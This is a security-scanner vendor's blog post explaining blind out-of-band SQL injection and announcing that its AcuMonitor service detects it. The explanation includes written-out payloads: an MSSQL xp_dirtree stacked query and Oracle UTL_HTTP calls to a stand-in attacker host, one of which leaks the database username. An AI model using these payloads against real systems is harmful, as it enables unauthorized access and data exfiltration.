Blind Out-of-band SQL Injection vulnerability testing added to AcuMonitor

Acunetix AcuMonitor is a free intermediary service that helps detect second-order vulnerabilities (i.e. vulnerabilities that do not provide a response to a scanner during testing) during a scan. AcuMonitor made its debut with Acunetix WVS version 9. Since then, we’ve continuously improved the service and the number of vulnerabilities it can detect.

With the latest updates to v10, we’ve added two more categories of vulnerabilities that can be detected with AcuMonitor – Blind Out-of-band SQL Injection vulnerabilities and Blind Out-of-band Remote Code Execution vulnerabilities. Let’ start with the first category.

Blind Out-of-band SQL Injection vulnerabilities

To understand how this type of vulnerability works, let’s consider the following SQL query that executes on a Microsoft SQL Server database.

SELECT * FROM products WHERE id={userInput}

The value of id comes from user input, from a URL such as the following.

https://example.com/products.aspx?id=1

This URL will generate the following SQL query.

SELECT * FROM products WHERE id=1

This is clearly vulnerable to SQL injection. However, if the page response content remains the same, regardless of the user input and hidden database errors, the only way to detect this vulnerability is through blind techniques such as causing a server delay. Blind techniques based on timing can produce false positives when the server responses are not very stable.

Another way to detect such vulnerabilities is using OOB (Out-of-band techniques). Consider the following URL crafted by an attacker.

https://example.com/products.aspx?id=1;EXEC%20master..xp_dirtree%20'%5c%5ctest.attacker.com%5c'+--+

Let’s URL decode this payload

https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' --

This will produce the following SQL query.

SELECT * FROM products WHERE id=1;EXEC master..xp_dirtree '\\test.attacker.com\' -- 

What happened is that there are now two separated queries that SQL Server will execute.

/* First Query */
SELECT * FROM products WHERE id=1

/* Second Query */
EXEC master..xp_dirtree '\\test.attacker.com\' -- 

The second query is invoking a stored procedure xp_dirtree. This extended stored procedure can be used to get a list of all the folders for the folder named in the xp.

SQL Server will now proceed to list all the folders from \\test.attacker.com\. To do this, it must first resolve the address of the domain test.attacker.com, for which it makes a DNS query to attacker’s DNS server. The attacker can monitor DNS server logs and look for queries to test.attacker.com. If such a DNS query is made, it means that the SQL Injection vulnerability is exploitable via an Out-of-Band vector.

The above example applies specifically to Microsoft SQL Server, however a variation of this attack can also be crafted for Oracle databases.

For Oracle databases, the query would look something like the following:

SELECT * FROM products WHERE id=1||UTL_HTTP.request('http://test.attacker.com/') -- 

The UTL_HTTP package makes Hypertext Transfer Protocol (HTTP) callouts from SQL and PL/SQL. You can use it to access data on the Internet over HTTP.

This Out-of-band technique can also be used to exfiltrate data. The following query can be used.

SELECT * FROM products WHERE id=1||UTL_HTTP.request('http://test.attacker.com/'||(SELECT user FROM DUAL)) --

This will generate an HTTP request that will contain the username (e.g. http://test.attacker.com/admin) and will be sent to the attacker’s domain. The attacker can monitor the web server’s logs and see the database server username.

Acunetix WVS v10, together with Acunetix AcuMonitor have been upgraded to use Out-of-band techniques in order to detect Blind Out-of-band SQL Injection vulnerabilities in web applications using Microsoft SQL Server and Oracle databases.

When such vulnerability is found, an email will be sent to the email address that was used to register to AcuMonitor.

AcuMonitor Blind Out-of-band) SQL injection alert

AcuMonitor Blind Out-of-band) SQL injection alert

The user can download and open the report file and this will load the HTTP request that caused the Blind Out-of-band SQL Injection vulnerability. It’s also possible to take the request id (in this case 118-1) and look it up in Application Settings->AcuMonitor->Lookup Request.

 

Share this post

Leave a Reply

Your email address will not be published.